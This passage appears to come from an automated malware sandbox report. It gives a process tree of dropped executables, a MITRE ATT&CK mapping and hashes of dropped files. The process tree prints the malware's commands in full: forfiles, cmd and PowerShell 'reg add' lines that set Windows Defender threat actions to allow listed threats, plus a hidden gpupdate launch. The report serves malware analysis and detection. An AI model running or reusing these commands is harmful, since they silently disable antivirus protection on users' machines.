    - Blocklisted process makes network request
    - Loads dropped DLL
    PID:4544

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3032 -ip 3032
1⤵
PID:3680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4256 -ip 4256
1⤵
PID:4632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2192 -ip 2192
1⤵
PID:3860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5000 -ip 5000
1⤵
PID:1236

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:1724
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:3588
- - C:\Windows\Temp\932817.exe
    "C:\Windows\Temp\932817.exe" --list-devices
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3560 -ip 3560
1⤵
PID:1488

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
PID:3312

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
1⤵
PID:2788

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:5516

C:\Users\Admin\AppData\Local\Temp\7zSE7DF.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSE7DF.tmp\Install.exe it /cyldidHvBQ 385118 /S
1⤵
PID:5544
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5812
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5684
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5184
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5668
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5968
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5304
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5912
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5784
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5560
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4500
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5640
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2124
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:6008

C:\Users\Admin\AppData\Local\Temp\7zSE7DF.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSE7DF.tmp\Install.exe it /cyldidHvBQ 385118 /S
1⤵
PID:5972
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:848
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:3148
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5892
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4620
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5184
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5680
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5284
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:4272
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5484
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5404
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:3228
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5268
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2596
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:1416
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5264
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:1220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GameSyncLink\GameService.exe

Filesize
288KB

MD5
d9ec6f3a3b2ac7cd5eef07bd86e3efbc

SHA1
e1908caab6f938404af85a7df0f80f877a4d9ee6

SHA256
472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

SHA512
1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

Download Submit
C:\Program Files (x86)\GameSyncLink\installg.bat

Filesize
284B

MD5
5dee3cbf941c5dbe36b54690b2a3c240

SHA1
82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

SHA256
98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

SHA512
9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2979eabc783eaca50de7be23dd4eafcf

SHA1
d709ce5f3a06b7958a67e20870bfd95b83cad2ea

SHA256
006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

SHA512
92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

Download Submit
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe

Filesize
1.9MB

MD5
d3a7d09173b5bc95c1ec9ae1681e6bdd

SHA1
00d9df9d4221e93dc3e4712867fe6b0778205bd5

SHA256
e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090

SHA512
6052c4df2142a729f5d7fffeb5714705784528ef6383332f4177edfd2589df8b093cc3de0edaeb6e6408055d491a31f8bc2bf94e3a92f5fefca7f5a47018b158

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe

Filesize
321KB

MD5
1c7d0f34bb1d85b5d2c01367cc8f62ef

SHA1
33aedadb5361f1646cffd68791d72ba5f1424114

SHA256
e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c

SHA512
53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe

Filesize
304KB

MD5
8510bcf5bc264c70180abe78298e4d5b

SHA1
2c3a2a85d129b0d750ed146d1d4e4d6274623e28

SHA256
096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6

SHA512
5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe

Filesize
158KB

MD5
317465164f61fe462864a65b732ccc13

SHA1
5b78c41ad423766e9aadae91f902d14a922c8666

SHA256
95674cb006bfca36cd0e0f9b80ef0ed240c64f2ee955d9dd4af8102a0c4d9806

SHA512
9bc4846a92b7b25e973b42c2cd4895dd15132d0fa1d9ee62e8d7e3679e8bb3b75ae9fb5c6fa165af0f77eaf3e3f75a4d7f60057a0cb22693fc80d89390d09046

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe

Filesize
389KB

MD5
d6078bbecc15a333c6171debc4488498

SHA1
ca57a639ec0fc1a6489b69278478c5845a4c046b

SHA256
8ddb2ac7260e57b2f20a55e30eb1b41595f38bf484b0a94e9495f3107c3bb913

SHA512
912f67baa141bb846a12568c94d5dfbd6d6cdefe0a036a9249accd83e9ee460bc8863758c8bd5cdac7a0af3f481194b57ef414378ebb400967579ba6d736469e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe

Filesize
564KB

MD5
f15a9cfa3726845017a7f91abe0a14f7

SHA1
5540ae40231fe4bf97e59540033b679dda22f134

SHA256
2dec75328413d4c278c119db42920fb183a88a5398d56ecc80c8cc74fba13071

SHA512
1c2af9608736ad6a02d093f769fe5ec5a06cb395a639e021d4ee3f6c46cebc8c101e7db1064984f801ad3bee65d81b95fe6e2e60c0ec949bb172ba9c455b9869

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe

Filesize
2.7MB

MD5
31841361be1f3dc6c2ce7756b490bf0f

SHA1
ff2506641a401ac999f5870769f50b7326f7e4eb

SHA256
222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

SHA512
53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe

Filesize
4.2MB

MD5
0f52e5e68fe33694d488bfe7a1a71529

SHA1
11d7005bd72cb3fd46f24917bf3fc5f3203f361f

SHA256
efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8

SHA512
238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe

Filesize
418KB

MD5
0099a99f5ffb3c3ae78af0084136fab3

SHA1
0205a065728a9ec1133e8a372b1e3864df776e8c

SHA256
919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

SHA512
5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe

Filesize
368KB

MD5
6a4d3d2cb5afb4a094be9cf830f8f7e5

SHA1
1039d1fe3203ff067e591f5eff0f9a1cd8aec6a8

SHA256
48449f2a6be4b1c6ac80923f21a28a9336e759ba1bc15564c057a464f01e5dca

SHA512
44c8a54a5b847295cb3122f5cc1824a3fe4e71ed8cba2bd1d5f6ccbbbdfa5c37dbb3343a7ab1d24d41064602e14004a4d3132ec6c4bd4a67d406153a8c52d77b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe

Filesize
227KB

MD5
07a6ab2bd94fce3167f318aecc447dcf

SHA1
20a1b851ca96e1567d57e02b4699610dd7fe92a6

SHA256
acffd8900443ac894f081b3fb05c5c5ee7c5290554812410597c0b2c5d0f343a

SHA512
84dc9376437ecc01f115a076ea1badf6f2001cff4566d17e193331b36c12bbe29c402cb78cb837e07295cfe8b6237a17a22ac24624902c472dd8a23ef2b7b0d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\124900551406_Desktop.zip

Filesize
176KB

MD5
2fac0196027d760f6f12dba6bc63c2a3

SHA1
d85f0933c20ac0ec2e7612da2438e2465928f9fa

SHA256
3067531e6530a47fc166a7e5592a4b3ba1adf7df4f20f6c3c7f10f5f4ade822e

SHA512
d67e5d84652d7562df1553fa5bd0d2a9b41a7c6c398921429f7725592280ffbb068dd304fde608897bd27a2b5c3e031d18cb7f77434e875e0b47f32c32f6c7db

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS119F.tmp\Install.exe

Filesize
6.4MB

MD5
220a02a940078153b4063f42f206087b

SHA1
02fc647d857573a253a1ab796d162244eb179315

SHA256
7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60

SHA512
42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tmp6D21.tmp

Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_Files_\JoinDeny.txt

Filesize
176KB

MD5
d66a7c36f4a0cbbfbd7075c5765e5ac7

SHA1
5472bb2f728ba3321e049c85b976069602b1eb79

SHA256
4a87238bc2ddaa657b7e0d3c7970304eaf56d797019c72ac9fbf7fffacace3fc

SHA512
610856aea7288d3d873ef91422a60f08d95150c5cb5d1c247f3aa0145601fb96211eb48b66e772bd15d6eda01e80ed2a0674cb0a8ac0c04de432cf0e15107c9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1yoig42d.3vb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
3KB

MD5
c6b37f89a85862c9d54c518f8c186a54

SHA1
d9267ba8c752961f29b9fad768ce0c37754a7baf

SHA256
61681366a42d88d5c1f98962309f588f229a58fc404eaba35c223bf388c5c2dd

SHA512
8be1f41dab48d2c9fa3790940f7dd53c2fac40876e43737171e2794191a1b2266fbc5b088c96a8a7aef5d41ce82b7d82606ec06308fee65496538cc45677055e

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1ow.0.exe

Filesize
226KB

MD5
c4b38f17b16a0b545d989a5e7f192308

SHA1
7325ba75f76855f332e840d595cadc591ea220af

SHA256
45072f942cb27587d1815a9c079c066c85ac313fe1388fd61dd69c77bdc68b4b

SHA512
